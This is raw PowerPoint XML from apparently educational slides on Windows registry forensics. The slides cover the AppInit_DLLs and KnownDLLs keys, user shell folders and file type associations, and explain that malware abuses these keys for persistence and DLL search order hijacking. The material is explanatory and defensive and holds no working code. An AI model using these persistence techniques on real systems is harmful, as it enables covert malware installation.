              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="696652" y="2420888"/>
            <a:ext cx="7750696" cy="3950701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3212402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gn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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4</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015274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7948405" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows stores each user’s personal folders in the keys I’ve identified above. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>will include your music, documents, downloads, etc. and other folders. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, malware can change this behavior to load a malicious executable rather than (let’s say you wanted to open up the Music folder) the intended folder.</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security Issues about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Keys in Previous Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直線接點 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="5013176"/>
            <a:ext cx="26642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44008" y="5445224"/>
            <a:ext cx="26642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46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1" y="2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsNT</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CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AppInit_DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AppInit_DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Key Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2489769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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538168" y="2095323"/>
            <a:ext cx="8172400" cy="4162976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1905424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7948405" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Several DLL files are loaded by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> file, which is responsible for providing the core functionality in user interfaces like management, message passing, input processing, and standard controls. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DLLs are recorded in the registry we’ve mentioned. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>registry key is worth mentioning and monitoring for malware residence.</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AppInit_DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Key Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622286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1" y="2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Control\Session Manager\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KnownDLLs</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KnownDLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4126200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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="2276872"/>
            <a:ext cx="8100392" cy="4075563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3167512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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Modify the list of known DLLs to add a malicious DLL to load before the signed version, since Microsoft follows a search order when finding DLLs to load. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key makes sure the DLLs are known to the system and can be included from a path that’s purposefully placed before the path of the original file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is also called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DLL Search Order Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” where a malicious DLL takes place of a well-known DLL, simply because of its placement.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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KnownDLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2347197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en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Classes\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT\ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What happens when a text file opens? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>commands are run from this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CLASSES_ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> hive as this is where the associations are kept.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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>File Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Association </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SyeedHasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147012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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKLM\Software\Classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
